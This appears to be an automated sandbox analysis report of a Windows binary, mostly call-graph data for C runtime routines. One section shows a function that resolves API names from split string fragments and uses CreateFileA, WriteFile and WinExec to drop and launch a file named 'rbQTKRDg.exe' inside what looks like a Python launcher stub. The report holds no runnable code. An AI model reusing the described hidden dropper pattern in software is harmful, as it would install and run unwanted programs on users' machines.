8674->8673 8681 40be62 8674->8681 8675->8673 8675->8674 8679 40bd98 8676->8679 8680 40bd7a 8676->8680 8683 403750 _strcpy_s 67 API calls 8677->8683 8686 403776 __dosmaperr 67 API calls 8678->8686 8691 40bfd4 8678->8691 8682 409420 __lseeki64_nolock 69 API calls 8679->8682 8684 403750 _strcpy_s 67 API calls 8680->8684 8681->8691 8701 40be7e 8681->8701 8702 40c094 8681->8702 8682->8675 8685 40c1db 8683->8685 8687 40bd7f 8684->8687 8688 403763 __tsopen_nolock 67 API calls 8685->8688 8686->8691 8689 403763 __tsopen_nolock 67 API calls 8687->8689 8688->8691 8689->8667 8690 403abd __mtdeletelocks 67 API calls 8690->8667 8691->8667 8691->8690 8692 40c10c ReadFile 8695 40c12b GetLastError 8692->8695 8692->8702 8693 40bee4 ReadFile 8694 40bf02 GetLastError 8693->8694 8693->8701 8694->8701 8695->8702 8697 40c049 GetLastError 8697->8678 8698 40bf61 8698->8691 8699 40bfdc 8698->8699 8700 40bfcf 8698->8700 8704 40bf99 MultiByteToWideChar 8698->8704 8699->8704 8707 409420 __lseeki64_nolock 69 API calls 8699->8707 8703 403750 _strcpy_s 67 API calls 8700->8703 8701->8693 8701->8698 8705 409420 __lseeki64_nolock 69 API calls 8701->8705 8702->8691 8702->8692 8706 409420 __lseeki64_nolock 69 API calls 8702->8706 8703->8691 8704->8691 8704->8697 8705->8701 8706->8702 8707->8704 8711 40a669 LeaveCriticalSection 8708->8711 8710 40c300 8710->8169 8711->8710 8715 40a669 LeaveCriticalSection 8712->8715 8714 40a1ec 8714->8200 8715->8714 8717 401fd7 8716->8717 8718 401fe9 8716->8718 8717->8207 8721 401f78 8718->8721 8722 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8721->8722 8723 401f8b 8722->8723 8724 401fa5 8723->8724 8726 405444 8723->8726 8724->8207 8727 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8726->8727 8728 405458 8727->8728 8729 405465 8728->8729 8730 406834 __isleadbyte_l 77 API calls 8728->8730 8729->8724 8731 40548d 8730->8731 8732 408b4c ___crtGetStringTypeA 91 API calls 8731->8732 8732->8729 8739 401ca4 8733->8739 8798 4041ef 8736->8798 8740 401d35 8739->8740 8744 401cb8 8739->8744 8741 403750 _strcpy_s 67 API calls 8740->8741 8742 401e4c 8741->8742 8743 4036e8 _strcpy_s 6 API calls 8742->8743 8745 4010ff 8742->8745 8743->8745 8744->8740 8748 401d27 8744->8748 8760 40437c 8744->8760 8745->8216 8745->8217 8747 404364 _parse_cmdline 77 API calls 8747->8748 8748->8747 8756 401da0 8748->8756 8758 401d7f 8748->8758 8749 401e02 8749->8740 8749->8745 8752 401e75 8749->8752 8750 401dbd 8750->8740 8751 401dd8 8750->8751 8754 40437c __cftof 77 API calls 8750->8754 8751->8740 8751->8745 8755 401dec 8751->8755 8753 40437c __cftof 77 API calls 8752->8753 8753->8745 8754->8751 8757 40437c __cftof 77 API calls 8755->8757 8756->8749 8756->8750 8757->8745 8758->8740 8758->8756 8759 40437c __cftof 77 API calls 8758->8759 8759->8756 8763 408379 8760->8763 8764 40838d 8763->8764 8765 408391 8764->8765 8767 4083c4 8764->8767 8766 403750 _strcpy_s 67 API calls 8765->8766 8790 404394 8765->8790 8768 4083ab 8766->8768 8770 4083f3 8767->8770 8771 4083d5 8767->8771 8767->8790 8769 4036e8 _strcpy_s 6 API calls 8768->8769 8769->8790 8773 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8770->8773 8772 403750 _strcpy_s 67 API calls 8771->8772 8774 4083dc 8772->8774 8775 4083fe 8773->8775 8776 4036e8 _strcpy_s 6 API calls 8774->8776 8777 408406 8775->8777 8779 40841b 8775->8779 8776->8790 8778 408eb6 __mbsnbcpy_s_l 67 API calls 8777->8778 8778->8790 8780 408457 8779->8780 8781 40851f 8779->8781 8783 408496 8780->8783 8784 408489 8780->8784 8795 40434b 8780->8795 8782 408550 8781->8782 8787 40434b __mbsnbcpy_s_l 77 API calls 8781->8787 8781->8790 8788 403750 _strcpy_s 67 API calls 8782->8788 8782->8790 8786 4084f6 8783->8786 8794 40849c 8783->8794 8784->8782 8784->8783 8789 403750 _strcpy_s 67 API calls 8786->8789 8787->8781 8788->8790 8791 4084fd 8789->8791 8790->8748 8792 4036e8 _strcpy_s 6 API calls 8791->8792 8792->8790 8793 40434b __mbsnbcpy_s_l 77 API calls 8793->8794 8794->8790 8794->8793 8796 4042f8 x_ismbbtype_l 77 API calls 8795->8796 8797 40435f 8796->8797 8797->8780 8799 404201 8798->8799 8800 404206 8798->8800 8799->8800 8806 404226 8799->8806 8801 403750 _strcpy_s 67 API calls 8800->8801 8802 40420b 8801->8802 8803 4036e8 _strcpy_s 6 API calls 8802->8803 8804 40118b 8803->8804 8804->8225 8805 403750 _strcpy_s 67 API calls 8805->8802 8807 404276 8806->8807 8809 408362 8806->8809 8807->8804 8807->8805 8812 4082c9 8809->8812 8813 4082f5 8812->8813 8814 4082d9 8812->8814 8816 408317 8813->8816 8817 4082fd 8813->8817 8815 403750 _strcpy_s 67 API calls 8814->8815 8819 4082de 8815->8819 8821 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8816->8821 8824 4082ee 8816->8824 8818 403750 _strcpy_s 67 API calls 8817->8818 8820 408302 8818->8820 8822 4036e8 _strcpy_s 6 API calls 8819->8822 8823 4036e8 _strcpy_s 6 API calls 8820->8823 8821->8824 8822->8824 8823->8824 8824->8807 8826 40cb86 8825->8826 8827 40cb66 8825->8827 8826->8827 8831 40cb9b 8826->8831 8828 403750 _strcpy_s 67 API calls 8827->8828 8829 40cb6b 8828->8829 8830 4036e8 _strcpy_s 6 API calls 8829->8830 8848 40cb7b 8830->8848 8875 40d7b8 8831->8875 8834 40d7b8 __execve 77 API calls 8835 40cbae 8834->8835 8863 40cc2f 8835->8863 8878 40bb06 8835->8878 8836 40d7b8 __execve 77 API calls 8838 40cc50 8836->8838 8839 40cc82 _strlen 8838->8839 8840 40cc56 8838->8840 8846 4039d1 __calloc_crt 67 API calls 8839->8846 8881 40d673 8840->8881 8842 40cbc9 _strlen 8844 4039d1 __calloc_crt 67 API calls 8842->8844 8842->8863 8843 40cc5f 8845 40cc77 8843->8845 8899 40cad7 8843->8899 8849 40cbe4 8844->8849 8845->8848 8851 403abd __mtdeletelocks 67 API calls 8845->8851 8847 40cc97 8846->8847 8847->8848 8852 408f6b _strcpy_s 67 API calls 8847->8852 8848->8244 8849->8848 8853 408f6b _strcpy_s 67 API calls 8849->8853 8851->8848 8854 40ccb3 8852->8854 8855 40cc00 8853->8855 8856 40ccc4 _strlen 8854->8856 8858 4035c0 __invoke_watson 10 API calls 8854->8858 8857 40cc11 8855->8857 8859 4035c0 __invoke_watson 10 API calls 8855->8859 8862 403750 _strcpy_s 67 API calls 8856->8862 8860 408df6 _strcat_s 67 API calls 8857->8860 8858->8856 8859->8857 8861 40cc1e 8860->8861 8861->8863 8864 4035c0 __invoke_watson 10 API calls 8861->8864 8868 40ccda 8862->8868 8863->8836 8864->8863 8865 408f6b _strcpy_s 67 API calls 8865->8868 8866 4035c0 __invoke_watson 10 API calls 8866->8868 8867 40d673 __waccess_s 69 API calls 8867->8868 8868->8865 8868->8866 8868->8867 8869 40cd2b 8868->8869 8870 40cd29 8868->8870 8871 403750 _strcpy_s 67 API calls 8869->8871 8874 403abd __mtdeletelocks 67 API calls 8870->8874 8872 40cd30 8871->8872 8873 40cad7 _wcomexecmd 136 API calls 8872->8873 8873->8870 8874->8845 8914 40d6fc 8875->8914 8877 40cba4 8877->8834 8921 40ba4a 8878->8921 8880 40bb18 8880->8842 8882 40d680 8881->8882 8883 40d6a4 8881->8883 8885 403763 __tsopen_nolock 67 API calls 8882->8885 8883->8882 8884 40d6ad GetFileAttributesA 8883->8884 8886 40d6d1 8884->8886 8887 40d6bb GetLastError 8884->8887 8888 40d685 8885->8888 8895 403763 __tsopen_nolock 67 API calls 8886->8895 8896 40d69c 8886->8896 8889 403776 __dosmaperr 67 API calls 8887->8889 8890 403750 _strcpy_s 67 API calls 8888->8890 8892 40d6c7 8889->8892 8891 40d68c 8890->8891 8893 4036e8 _strcpy_s 6 API calls 8891->8893 8894 403750 _strcpy_s 67 API calls 8892->8894 8893->8896 8894->8896 8897 40d6e4 8895->8897 8896->8843 8898 403750 _strcpy_s 67 API calls 8897->8898 8898->8892 8900 40cb03 8899->8900 8901 40cae6 8899->8901 8900->8901 8902 40cb08 8900->8902 8903 403750 _strcpy_s 67 API calls 8901->8903 8928 40d29a 8902->8928 8905 40caeb 8903->8905 8907 4036e8 _strcpy_s 6 API calls 8905->8907 8908 40cafb 8907->8908 8908->8845 8911 403abd __mtdeletelocks 67 API calls 8912 40cb40 8911->8912 8913 403abd __mtdeletelocks 67 API calls 8912->8913 8913->8908 8915 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8914->8915 8916 40d715 8915->8916 8917 403750 _strcpy_s 67 API calls 8916->8917 8920 40d731 _strrchr 8916->8920 8918 40d721 8917->8918 8919 4036e8 _strcpy_s 6 API calls 8918->8919 8919->8920 8920->8877 8922 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8921->8922 8923 40ba5e 8922->8923 8924 403750 _strcpy_s 67 API calls 8923->8924 8927 40ba7c __mbschr_l 8923->8927 8925 40ba6c 8924->8925 8926 4036e8 _strcpy_s 6 API calls 8925->8926 8926->8927 8927->8880 8929 40d2e8 _strlen 8928->8929 8930 4039d1 __calloc_crt 67 API calls 8929->8930 8931 40d307 8930->8931 8932 40d312 8931->8932 8933 40d335 8931->8933 8934 403750 _strcpy_s 67 API calls 8932->8934 9015 40adff 8933->9015 8937 40d31c 8934->8937 8936 40d343 8938 40d34a 8936->8938 8948 40d35e _strlen 8936->8948 8939 403763 __tsopen_nolock 67 API calls 8937->8939 8940 4035c0 __invoke_watson 10 API calls 8938->8940 8956 40d359 8938->8956 8947 40d327 8939->8947 8940->8956 8941 403abd __mtdeletelocks 67 API calls 8985 40d3cb 8941->8985 8942 401ee2 __invoke_watson 5 API calls 8943 40cb1e 8942->8943 8943->8908 8986 40d08b 8943->8986 8944 40d3d8 8949 408f6b _strcpy_s 67 API calls 8944->8949 8960 40d3ec _strlen 8944->8960 8947->8942 8948->8944 8952 4063a0 ___crtGetEnvironmentStringsA 76 API calls 8948->8952 8969 40d3f2 _strlen 8948->8969 8951 40d4ec 8949->8951 8951->8960 8953 40d3b4 8952->8953 8953->8956 8953->8969 8954 408f6b _strcpy_s 67 API calls 8954->8960 8956->8941 8957 40d48e 8961 4039d1 __calloc_crt 67 API calls 8957->8961 8958 4035c0 __invoke_watson 10 API calls 8958->8960 8959 40d5c1 8959->8985 8960->8954 8960->8958 8965 40d54d __cenvarg _strlen 8960->8965 8964 40d499 8961->8964 8962 408f6b _strcpy_s 67 API calls 8962->8965 8964->8944 8965->8959 8965->8962 8972 4035c0 __invoke_watson 10 API calls 8965->8972 8965->8985 8969->8957 9039 40d997 8969->9039 8972->8965 8988 40d0a4 8986->8988 8997 40d0b5 _memset 8986->8997 8987 40d0c1 8989 403763 __tsopen_nolock 67 API calls 8987->8989 8988->8987 8988->8997 8990 40d0c6 8989->8990 8991 403750 _strcpy_s 67 API calls 8990->8991 8993 40d0cd 8991->8993 8992 40d287 8996 403750 _strcpy_s 67 API calls 8992->8996 8995 4036e8 _strcpy_s 6 API calls 8993->8995 8994 4039d1 __calloc_crt 67 API calls 8998 40d16a 8994->8998 8999 40cb36 8995->8999 8996->8999 8997->8992 8997->8994 8998->8992 9001 40d177 8998->9001 8999->8911 9000 403763 __tsopen_nolock 67 API calls 9002 40d1f9 CreateProcessA GetLastError 9000->9002 9001->9000 9003 403abd __mtdeletelocks 67 API calls 9002->9003 9004 40d22c 9003->9004 9005 40d231 9004->9005 9006 40d23a 9004->9006 9007 403776 __dosmaperr 67 API calls 9005->9007 9008 40d246 9006->9008 9165 4023ea 9006->9165 9007->8999 9010 40d251 WaitForSingleObject GetExitCodeProcess 9008->9010 9011 40d26e 9008->9011 9016 40ae0b __calloc_impl 9015->9016 9017 403ef9 __lock 67 API calls 9016->9017 9018 40ae12 9017->9018 9019 40ae26 9018->9019 9022 40ae5c 9018->9022 9020 403750 _strcpy_s 67 API calls 9019->9020 9021 40ae2b 9020->9021 9023 4036e8 _strcpy_s 6 API calls 9021->9023 9042 40ad78 9022->9042 9037 40ae3a 9023->9037 9026 40ae64 _strlen 9028 401a9b _calloc 67 API calls 9026->9028 9026->9037 9027 40aed3 __calloc_impl 9027->8936 9029 40ae7d 9028->9029 9030 40ae86 9029->9030 9031 40ae9d 9029->9031 9032 403750 _strcpy_s 67 API calls 9030->9032 9033 408f6b _strcpy_s 67 API calls 9031->9033 9034 40ae8b 9032->9034 9035 40aea7 9033->9035 9036 403750 _strcpy_s 67 API calls 9034->9036 9035->9037 9038 4035c0 __invoke_watson 10 API calls 9035->9038 9036->9037 9048 40aedc 9037->9048 9038->9037 9129 40d7cf 9039->9129 9043 40ad91 9042->9043 9044 40ad8d 9042->9044 9043->9044 9046 40ada3 _strlen 9043->9046 9051 40b169 9043->9051 9044->9026 9046->9044 9061 40b14f 9046->9061 9128 403e1f LeaveCriticalSection 9048->9128 9050 40aee3 9050->9027 9058 40b1e9 9051->9058 9059 40b184 9051->9059 9052 40b18a WideCharToMultiByte 9052->9058 9052->9059 9053 4039d1 __calloc_crt 67 API calls 9053->9059 9054 40b1ad WideCharToMultiByte 9055 40b1f5 9054->9055 9054->9059 9056 403abd __mtdeletelocks 67 API calls 9055->9056 9056->9058 9058->9046 9059->9052 9059->9053 9059->9054 9059->9058 9060 403abd __mtdeletelocks 67 API calls 9059->9060 9064 40b7aa 9059->9064 9060->9059 9110 40b061 9061->9110 9065 40b7dc 9064->9065 9066 40b7bf 9064->9066 9068 40b83a 9065->9068 9071 40bb06 ___crtsetenv 77 API calls 9065->9071 9067 403750 _strcpy_s 67 API calls 9066->9067 9069 40b7c4 9067->9069 9070 403750 _strcpy_s 67 API calls 9068->9070 9072 4036e8 _strcpy_s 6 API calls 9069->9072 9099 40b7d4 9070->9099 9074 40b7ef 9071->9074 9072->9099 9073 40b81b 9075 40b878 9073->9075 9077 40b84d 9073->9077 9078 40b831 9073->9078 9074->9068 9074->9073 9076 40b750 _copy_environ 67 API calls 9074->9076 9079 40b6fe ___crtsetenv 111 API calls 9075->9079 9075->9099 9076->9073 9082 40398c __malloc_crt 67 API calls 9077->9082 9077->9099 9080 40b169 ___wtomb_environ 120 API calls 9078->9080 9081 40b89c 9079->9081 9084 40b836 9080->9084 9085 40b8f5 9081->9085 9087 40b8a7 9081->9087 9083 40b85d 9082->9083 9083->9075 9090 40398c __malloc_crt 67 API calls 9083->9090 9083->9099 9084->9068 9084->9075 9090->9075 9099->9059 9111 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 9110->9111 9112 40b075 9111->9112 9113 40b096 9112->9113 9114 40b0c9 9112->9114 9124 40b07e 9112->9124 9115 403750 _strcpy_s 67 API calls 9113->9115 9117 40b0d3 9114->9117 9118 40b0ed 9114->9118 9116 40b09b 9115->9116 9119 4036e8 _strcpy_s 6 API calls 9116->9119 9120 403750 _strcpy_s 67 API calls 9117->9120 9121 40b0f5 9118->9121 9122 40b109 9118->9122 9119->9124 9125 40b0d8 9120->9125 9126 40b604 __strnicoll_l 111 API calls 9121->9126 9123 40b5c2 ___crtCompareStringA 100 API calls 9122->9123 9123->9124 9124->9046 9127 4036e8 _strcpy_s 6 API calls 9125->9127 9126->9124 9127->9124 9128->9050 9168 4022a8 9165->9168 9194 402024 9193->9194 9195 402007 9193->9195 9194->9195 9196 40202b 9194->9196 9197 403750 _strcpy_s 67 API calls 9195->9197 9199 402793 __output_l 103 API calls 9196->9199 9198 40200c 9197->9198 9200 4036e8 _strcpy_s 6 API calls 9198->9200 9201 402051 9199->9201 9202 40201c 9200->9202 9201->9202 9204 4054fc 9201->9204 9202->8253 9205 40357f __fileno 67 API calls 9204->9205 9206 40550c 9205->9206 9207 405517 9206->9207 9208 40552e 9206->9208 9209 403750 _strcpy_s 67 API calls 9207->9209 9210 405532 9208->9210 9213 40553f __flsbuf 9208->9213 9211 40551c 9209->9211 9212 403750 _strcpy_s 67 API calls 9210->9212 9211->9202 9212->9211 9213->9211 9220 40659d __write_nolock 67 API calls 9213->9220 9221 405595 9213->9221 9224 4055a0 9213->9224 9214 40562f 9217 40810c __locking 101 API calls 9214->9217 9215 4055af 9216 4055c6 9215->9216 9219 4055e3 9215->9219 9218 40810c __locking 101 API calls 9216->9218 9217->9211 9218->9211 9219->9211 9228 4094a5 9219->9228 9220->9221 9221->9224 9225 4095be 9221->9225 9224->9214 9224->9215 9226 40398c __malloc_crt 67 API calls 9225->9226 9227 4095d3 9226->9227 9227->9224 9229 4094b1 __calloc_impl 9228->9229 9230 4094c2 9229->9230 9231 4094de 9229->9231 9233 403763 __tsopen_nolock 67 API calls 9230->9233 9232 4094ec 9231->9232 9234 40950d 9231->9234 9235 403763 __tsopen_nolock 67 API calls 9232->9235 9236 4094c7 9233->9236 9238 409553 9234->9238 9239 40952d 9234->9239 9237 4094f1 9235->9237 9240 403750 _strcpy_s 67 API calls 9236->9240 9242 403750 _strcpy_s 67 API calls 9237->9242 9241 40a5c9 ___lock_fhandle 68 API calls 9238->9241 9243 403763 __tsopen_nolock 67 API calls 9239->9243 9251 4094cf __calloc_impl 9240->9251 9244 409559 9241->9244 9245 4094f8 9242->9245 9246 409532 9243->9246 9247 409582 9244->9247 9248 409566 9244->9248 9249 4036e8 _strcpy_s 6 API calls 9245->9249 9250 403750 _strcpy_s 67 API calls 9246->9250 9253 403750 _strcpy_s 67 API calls 9247->9253 9252 409420 __lseeki64_nolock 69 API calls 9248->9252 9249->9251 9254 409539 9250->9254 9251->9211 9255 409577 9252->9255 9256 409587 9253->9256 9257 4036e8 _strcpy_s 6 API calls 9254->9257 9260 4095b4 9255->9260 9258 403763 __tsopen_nolock 67 API calls 9256->9258 9257->9251 9258->9255 9263 40a669 LeaveCriticalSection 9260->9263 9262 4095bc 9262->9251 9263->9262 9424 40199d 9431 403d74 9424->9431 9427 4019b0 9429 403abd __mtdeletelocks 67 API calls 9427->9429 9430 4019bb 9429->9430 9444 403c9a 9431->9444 9433 4019a2 9433->9427 9434 403b4b 9433->9434 9435 403b57 __calloc_impl 9434->9435 9436 403ef9 __lock 67 API calls 9435->9436 9440 403b63 9436->9440 9437 403bcc 9485 403be1 9437->9485 9439 403bd8 __calloc_impl 9439->9427 9440->9437 9441 403ba1 DeleteCriticalSection 9440->9441 9472 40795d 9440->9472 9443 403abd __mtdeletelocks 67 API calls 9441->9443 9443->9440 9445 403ca6 __calloc_impl 9444->9445 9446 403ef9 __lock 67 API calls 9445->9446 9452 403cb5 9446->9452 9447 403d4d 9462 403d6b 9447->9462 9450 403d59 __calloc_impl 9450->9433 9452->9447 9453 403c52 105 API calls __fflush_nolock 9452->9453 9454 4019fe 9452->9454 9459 403d3c 9452->9459 9453->9452 9455 401a21 EnterCriticalSection 9454->9455 9456 401a0b 9454->9456 9455->9452 9457 403ef9 __lock 67 API calls 9456->9457 9458 401a14 9457->9458 9458->9452 9465 401a6c 9459->9465 9461 403d4a 9461->9452 9471 403e1f LeaveCriticalSection 9462->9471 9464 403d72 9464->9450 9466 401a7c 9465->9466 9467 401a8f LeaveCriticalSection 9465->9467 9470 403e1f LeaveCriticalSection 9466->9470 9467->9461 9469 401a8c 9469->9461 9470->9469 9471->9464 9473 407969 __calloc_impl 9472->9473 9474 40799a 9473->9474 9475 40797d 9473->9475 9477 4019bd __lock_file 68 API calls 9474->9477 9482 407992 __calloc_impl 9474->9482 9476 403750 _strcpy_s 67 API calls 9475->9476 9478 407982 9476->9478 9479 4079b2 9477->9479 9480 4036e8 _strcpy_s 6 API calls 9478->9480 9488 4078e6 9479->9488 9480->9482 9482->9440 9511 403e1f LeaveCriticalSection 9485->9511 9487 403be8 9487->9439 9489 407916 9488->9489 9490 4078fa 9488->9490 9493 403bea __flush 101 API calls 9489->9493 9496 40790f 9489->9496 9491 403750 _strcpy_s 67 API calls 9490->9491 9492 4078ff 9491->9492 9494 4036e8 _strcpy_s 6 API calls 9492->9494 9495 407922 9493->9495 9494->9496 9507 40a1ee 9495->9507 9504 4079d1 9496->9504 9499 40357f __fileno 67 API calls 9500 407930 9499->9500 9501 40a121 __close 72 API calls 9500->9501 9502 407936 9501->9502 9502->9496 9503 403abd __mtdeletelocks 67 API calls 9502->9503 9503->9496 9505 401a30 _fprintf 2 API calls 9504->9505 9506 4079d7 9505->9506 9506->9482 9508 40a1fe 9507->9508 9510 40792a 9507->9510 9509 403abd __mtdeletelocks 67 API calls 9508->9509 9508->9510 9509->9510 9510->9499 9511->9487

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 414044-414074 GetPEB 1 414077-41409a 0->1 2 41409d-4140a0 1->2 3 4140a6-4140bc 2->3 4 4141ee-41422b CreateFileA 2->4 5 414110-414116 3->5 6 4140be-4140c5 3->6 21 414265-414269 4->21 22 41422d-414230 4->22 8 414129-41412f 5->8 9 414118-41411f 5->9 6->5 10 4140c7-4140ce 6->10 12 414131-414138 8->12 13 414148-41414e 8->13 9->8 11 414121-414124 9->11 10->5 14 4140d0-4140d7 10->14 16 4141bb-4141c0 11->16 12->13 17 41413a-414141 12->17 18 414150-414157 13->18 19 414167-41416f 13->19 14->5 20 4140d9-4140dd 14->20 24 4141e0-4141e9 16->24 25 4141c2-4141c5 16->25 17->13 23 414143-414146 17->23 18->19 26 414159-414160 18->26 27 414171-414178 19->27 28 414188-41418e 19->28 20->5 29 4140df-4140e3 20->29 32 414232-414238 22->32 23->16 24->2 25->24 33 4141c7-4141ca 25->33 26->19 34 414162-414165 26->34 27->28 35 41417a-414181 27->35 30 414190-414197 28->30 31 4141a7-4141ad 28->31 29->16 36 4140e9-41410b 29->36 30->31 37 414199-4141a0 30->37 31->16 38 4141af-4141b6 31->38 39 414246-414252 WriteFile 32->39 40 41423a-414242 32->40 33->24 41 4141cc-4141cf 33->41 34->16 35->28 42 414183-414186 35->42 36->1 37->31 44 4141a2-4141a5 37->44 38->16 45 4141b8 38->45 47 414255-414262 CloseHandle WinExec 39->47 40->32 46 414244 40->46 41->24 48 4141d1-4141d4 41->48 42->16 44->16 45->16 46->47 47->21 48->24 49 4141d6-4141d9 48->49 49->24 50 4141db-4141de 49->50 50->4 50->24
                              APIs
                              • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00414223
                              • WriteFile.KERNELBASE(00000000,FFFEE3A2,00003E00,?,00000000), ref: 00414252
                              • CloseHandle.KERNELBASE(00000000), ref: 00414256
                              • WinExec.KERNEL32(?,00000005), ref: 00414262
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: File$CloseCreateExecHandleWrite
                              • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$rbQTKRDg.exe
                              • API String ID: 3741012433-3835159777
                              • Opcode ID: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
                              • Instruction ID: 0fad939afa1a3e6eef74dcea6ddb39993472a9db8089d9d8a1791b0fffe143ca
                              • Opcode Fuzzy Hash: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
                              • Instruction Fuzzy Hash: 1C611978D00215ABCF24CF94D848AEEBBB0BB94315F2582ABD505A7741C7789EC1CB99

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: _fprintf$FileModuleName__close__execv__open__read_calloc_strncmp
                              • String ID: #!python.exe$-script.pyw$Cannot find Python executable %s$Cannot open %s$Could not exec %s
                              • API String ID: 2502740745-3972628896
                              • Opcode ID: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
                              • Instruction ID: 796e4f919e2f8e9c448ad3e98618f95884ab6d66caa4008a2a0434ec9930ee7c
                              • Opcode Fuzzy Hash: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
                              • Instruction Fuzzy Hash: A07136719043419BD320EF65D885B9B73E8AFD8304F14493EF489A73E1E639E9448B9B

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 121 4021b8-4021c9 call 40218d ExitProcess
                              APIs
                              • ___crtCorExitProcess.LIBCMT ref: 004021C0
                                • Part of subcall function 0040218D: GetModuleHandleW.KERNEL32(mscoree.dll,?,004021C5,?,?,00406AFB,000000FF,0000001E,?,0040399D,?,00000001,?,?,00403E83,00000018), ref: 00402197
                                • Part of subcall function 0040218D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004021A7
                              • ExitProcess.KERNEL32 ref: 004021C9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                              • String ID:
                              • API String ID: 2427264223-0
                              • Opcode ID: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
                              • Instruction ID: 4f065410a833747b2fa51117dbabb5f5d23e2195355c7fa658f3e8009557e2db
                              • Opcode Fuzzy Hash: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
                              • Instruction Fuzzy Hash: F4B09B31000158BBDB012F23DD4DC4D7F55DB403917104035F914190B1DFB1AD5299D4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 124 4064d7-4064f9 HeapCreate 125 4064fb-4064fc 124->125 126 4064fd-406506 124->126
                              APIs
                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004064EC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
                              • Instruction ID: fc63dde57cecbdf2c2aaf7bb1ec022fcb12f636a59951f49be284e9b9c4476cd
                              • Opcode Fuzzy Hash: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
                              • Instruction Fuzzy Hash: A9D05E72A903455AEB145F75BE08B623BDCD784795F00843AB80DC6190E5B4D5609948

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 127 4023d4-4023e0 call 4022a8 129 4023e5-4023e9 127->129
                              APIs
                              • _doexit.LIBCMT ref: 004023E0
                                • Part of subcall function 004022A8: __lock.LIBCMT ref: 004022B6
                                • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 004022ED
